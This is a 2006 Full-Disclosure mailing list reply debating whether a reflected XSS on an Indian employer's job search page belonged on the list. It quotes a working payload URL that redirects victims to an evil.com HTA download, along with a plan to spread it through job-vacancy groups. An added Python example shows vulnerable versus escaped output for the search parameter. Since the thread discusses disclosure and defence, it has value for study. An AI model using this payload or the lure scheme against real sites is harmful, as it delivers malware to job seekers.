Re: [Full-disclosure] MBT Xss vulnerability
- To: MuNNa <sant.jadhav@xxxxxxxxx>
- Subject: Re: [Full-disclosure] MBT Xss vulnerability
- From: "Native.Code" <native.code@xxxxxxxxx>
- Date: Sun, 22 Jan 2006 23:56:32 +0800
Nice discussion guys. Perhaps I should have mentioned that an XSS on every
site should not be posted to FD. And MBT does *not* attract millions of
job-seekers. It is an Indian employer, and IT job-seekers in India, at any
given time, should not number more than one million.
I believe most subscribers on this list did not need to know about this XSS. It
would have been better reported to the IT team at MBT.
Best.
On 1/21/06, MuNNa <sant.jadhav@xxxxxxxxx> wrote:
>
> Hi Bro,
>
> I got the point. You meant to say that XSS for each and every site should
> not be posted here, unless and until it attracts heavy traffic like Yahoo etc.
> I agree that MBT doesn't normally attract that amount of traffic, but
> you can target millions of users at one go.
> Like, say... there are many groups that post new job vacancies every day. So
> if I create a URL with JavaScript allowing you to download a file with, say,
> an .hta extension, and it claims to be some form that has to be filled in
> by the victim in order to apply for a job.
> For eg. http://www.mahindrabt.com/jse/jsp/search.jsp?q=<script>
> document.location='www.evil.com/applicationform.hta'</script>
>
> If you post this URL in any of the above groups, you can be sure that your
> file will be downloaded by thousands of users. This is because MBT is one
> of the top employers. Believe me.
>
> Before someone downloads such files and gets his machine compromised, I
> just wanted to warn the users. As the number of victims could be large enough to
> create havoc, MBT's XSS vuln was of great concern to me. This is what made
> me post this vuln over here. Maybe I might have posted it in the wrong
> list. If this is the case, I am sorry to cause annoyance to you and others.
>
> Regards;
> Santosh J.
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
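The thread discusses a reflected XSS in the `q` parameter of a search page. The following is an added example, not code from the thread or from MBT: a constructed stand-in for a search page that reflects `q` by string concatenation (the vulnerable pattern) beside the same page with HTML-entity encoding, using the payload quoted above to show that encoding leaves it as inert text.

```python
"""Reflected XSS in a search parameter: vulnerable reflection vs. output encoding.

Added example. render_vulnerable/render_hardened are constructed stand-ins for a
search page's server-side template; they are not the real search.jsp code.
"""
import html
from urllib.parse import parse_qs, urlsplit

# Payload quoted in the thread, in its URL-decoded form.
PAYLOAD = "<script>document.location='www.evil.com/applicationform.hta'</script>"


def query_param(url: str, name: str) -> str:
    """Return one query parameter, as a servlet's getParameter() would."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get(name, [""])[0]


def render_vulnerable(q: str) -> str:
    """Concatenates q straight into the HTML body: browser parses q as markup."""
    return f"<p>Results for: {q}</p>"


def render_hardened(q: str) -> str:
    """HTML-entity encodes q for the HTML-text context: browser shows q as text."""
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


def contains_live_script(page: str) -> bool:
    """Crude check used here to compare the two renderings: does an unescaped
    <script start tag survive in the response body?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    url = "http://www.mahindrabt.com/jse/jsp/search.jsp?q=" + PAYLOAD
    q = query_param(url, "q")
    print("vulnerable:", render_vulnerable(q))   # script tag reaches the browser
    print("hardened:  ", render_hardened(q))     # &lt;script&gt;... shown as text
```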